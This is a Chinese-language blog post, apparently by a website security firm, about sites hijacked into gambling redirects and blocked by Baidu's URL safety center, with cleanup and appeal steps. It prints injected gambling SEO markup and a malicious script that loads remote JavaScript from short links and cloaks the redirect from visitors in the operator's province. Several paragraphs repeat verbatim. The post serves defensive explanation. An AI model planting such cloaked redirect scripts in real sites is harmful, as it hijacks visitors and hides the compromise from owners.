很多客戶找到我們esafe網站安全公司,說自己的網站被百度網址安全中心攔截了,從百度
點擊網站進去跳轉到博彩網站上去,直接輸入網址不會出現跳轉。還有的客戶網站被百度攔截
的時候會有一些紅色文字提醒:
百度網址安全中心提醒您:該頁面可能已被非法篡改!等等的字樣,如下圖:
甚至有些客戶網站被駭後直接打開跳轉到彩票網站上去了,網站的百度快照與收錄也被篡改成了
什麼北京賽車,北京PK10,等等內容。大部分客戶的網站被百度攔截是因為網站存在漏洞被攻
擊,攻擊者篡改了網站首頁文件,我們eSafe白帽資安網在幫客戶解除百度攔截的時候,發現很多客戶
網站安全沒有設置到位,網站漏洞也沒有修復,包括網站後台賬號密碼都是弱密碼,什麼12345
6,111111,admin,還有的是ftp賬號密碼弱口令,默認的網站後台地址等等。
什麼北京賽車,北京PK10,等等內容。大部分客戶的網站被百度攔截是因為網站存在漏洞被攻
擊,攻擊者篡改了網站首頁文件,我們eSafe白帽資安網在幫客戶解除百度攔截的時候,發現很多客戶
網站安全沒有設置到位,網站漏洞也沒有修復,包括網站後台賬號密碼都是弱密碼,什麼12345
6,111111,admin,還有的是ftp賬號密碼弱口令,默認的網站後台地址等等。
(一)網站被百度網址安全中心攔截不要緊!遇事千萬不要慌,靜下來去分析問題
發生的根本,我們首先要檢測網站是否被黑,看下我們網站的首頁文件index.html或者index.php
文件裡代碼,一般會放在頭部,你會發現有一些加密的字符,很長一段,下面我貼出來。
文件裡代碼,一般會放在頭部,你會發現有一些加密的字符,很長一段,下面我貼出來。
<title>365bet游戏平台&
#95;365bet娱乐平台_
;bet365体育投注</title>
<meta name="keywords"
content="365bet平台注册
;,365bet体育平台&#
44;365bet娱乐平台,
365bet官方平台,
1;65bet开户平台,3&
#54;5bet平台赌场,36
;5bet皇冠平台,36&#
53;bet平台网投,365
bet平台规则,365	
8;et娱乐场平台,36
3;bet网站平台,365&
#98;et足球平台,365b
;et平台返利,365b&#
101;t网上娱乐平台,36
;5bet线上平台"/>
<meta name="description"
content="bet365体育国际
;娱乐【唯一博彩信誉
;担保第三方平台:(0
136566.com)】b&#
101;t365体育娱乐真人
;娱乐,亚洲最有公信
;力的网上娱乐平台官
;网保证玩家拿到每一
;分钱。【权威认证】
;"/>
標題,描述,都被修改成了加密的數字字符,我們對其解碼來看下。
unicode的加密方式我們用站長工具解密看下:
網站的標題都改成了博彩的關鍵詞.
我們最新發現網站被跳轉到博彩網站上,有些是根據IP來判斷跳轉的,比如說這個網站的運營者
是廣東省的,那麼攻擊者就會讓廣東省的IP都不會跳轉到博彩網站上,這個用意就是讓網站的運
營者無法發現網站出現了問題,來達到長期控制網站的目的。
是廣東省的,那麼攻擊者就會讓廣東省的IP都不會跳轉到博彩網站上,這個用意就是讓網站的運
營者無法發現網站出現了問題,來達到長期控制網站的目的。
代碼我們eSafe白帽資安網公佈出來:
<script language="javascript" src="http://t.cn/RBAcEC8"></script>
<script>var sf=returnCitySN["cname"]; if(sf.indexOf("廣東省")>=0)
{window.location.href="/indax.html";}</script>
<script language="javascript" src="http://t.cn/RBAaIdI"></script>
(二)再一個檢查網站的收錄情況:使用百度的site命令,site:www.客戶網址.com來看下網站
是否收錄了一些與網站內容不相關的百度快照,大部分是一些彩票,博彩的百度快照。再看下
網站是否會有百度的網址安全中心攔截,目前被百度安全中心攔截的提示會有如下幾種顯示:
是否收錄了一些與網站內容不相關的百度快照,大部分是一些彩票,博彩的百度快照。再看下
網站是否會有百度的網址安全中心攔截,目前被百度安全中心攔截的提示會有如下幾種顯示:
1.百度網址安全中心提醒您:該頁面可能已被非法篡改!
2.百度網址安全中心提醒您:該頁面可能存在釣魚欺詐信息!
3.百度網址安全中心提醒您:該頁面可能存在違法信息!
4.該頁面可能存在違法信息!
5.該頁面可能已被非法篡改!
6.該頁面可能存在釣魚欺詐信息!
(三) 如果對網站代碼不是太懂的話建議找專業網站安全公司來幫忙檢查,有些可能會找建站
公司幫忙檢查,大多數的建站公司不懂安全,只會簡單的清理代碼,清除跳轉,但是過不了幾
天網站又就被跳轉了,被百度攔截了,亡羊補牢而已,根本問題是網站存在漏洞,要對網站漏
洞進行修復。
公司幫忙檢查,大多數的建站公司不懂安全,只會簡單的清理代碼,清除跳轉,但是過不了幾
天網站又就被跳轉了,被百度攔截了,亡羊補牢而已,根本問題是網站存在漏洞,要對網站漏
洞進行修復。
既然發現了網站被百度攔截,那麼該如何解除攔截呢?
檢查網站代碼是否存在木馬後門,對網站裡的每個文件,每行代碼都進行人工安全檢測,發現
是否含有eval等一句話後門,以及一些加密的字符,如果有請仔細查看並對其清除,再一個對
網站漏洞進行修復,現在許多網站使用的都是開源的系統,比如織夢dedecms系統,discuz
論壇系統,phpcms,MetInfo,wordpress,帝國cms,蘋果cms,微擎系統,ecshop,對這些
系統的漏洞補丁經常的進行升級修復。上面大部分的系統都是開源的代碼,既然開源就是免費
對外,那麼就很容易被挖掘出漏洞,所以要對網站代碼及時的進行網站漏洞修復。
是否含有eval等一句話後門,以及一些加密的字符,如果有請仔細查看並對其清除,再一個對
網站漏洞進行修復,現在許多網站使用的都是開源的系統,比如織夢dedecms系統,discuz
論壇系統,phpcms,MetInfo,wordpress,帝國cms,蘋果cms,微擎系統,ecshop,對這些
系統的漏洞補丁經常的進行升級修復。上面大部分的系統都是開源的代碼,既然開源就是免費
對外,那麼就很容易被挖掘出漏洞,所以要對網站代碼及時的進行網站漏洞修復。
檢查網站的後台是否被人惡意登錄,檢查登錄的IP,以及通過網站日誌進行分析查看,是否有
其他的IP登錄了網站後台,修改網站後台默認地址,以及網站後台的賬號密碼,對網站安全比
較瞭解的話,也可以對網站後台登錄進行二次驗證碼驗證防護。
其他的IP登錄了網站後台,修改網站後台默認地址,以及網站後台的賬號密碼,對網站安全比
較瞭解的話,也可以對網站後台登錄進行二次驗證碼驗證防護。
對網站的目錄權限進行安全部署分配,比如圖片目錄,以及css,js,cache緩存目錄都設置為無
腳本執行權限,只有可寫權限即可。
腳本執行權限,只有可寫權限即可。
修復好了網站漏洞,以及清除網站木馬,刪除掉首頁的加密代碼,去除跳轉,直接
去百度網址安全中心提交申訴:
https://bsb.baidu.com/appeal 百度網址安全中心
提交後百度會在24小時內給予反饋。
解除百度安全攔截會有如下郵件:
尊敬的用戶:
您好!您於 2018年10月18日 09:17 對: http://www.客戶網址.cn/ 進行了誤報申訴。
百度網址安全技術人員答覆如下:
您好,對於 http://www.客戶網址.cn/ 的檢測結果為:通過審核
感謝您的反饋,該網站已經解除攔截。百度搜索中展示的“風險”提示,需要“12小時”後生效
;百度殺毒中展示的“風險”提示,需要“重啟電腦”後生效。我們會嚴格保護您的隱私,不會
洩露您提交的任何隱私信息。如有問題可隨時進行反饋,感謝支持!
;百度殺毒中展示的“風險”提示,需要“重啟電腦”後生效。我們會嚴格保護您的隱私,不會
洩露您提交的任何隱私信息。如有問題可隨時進行反饋,感謝支持!
百度網址安全中心
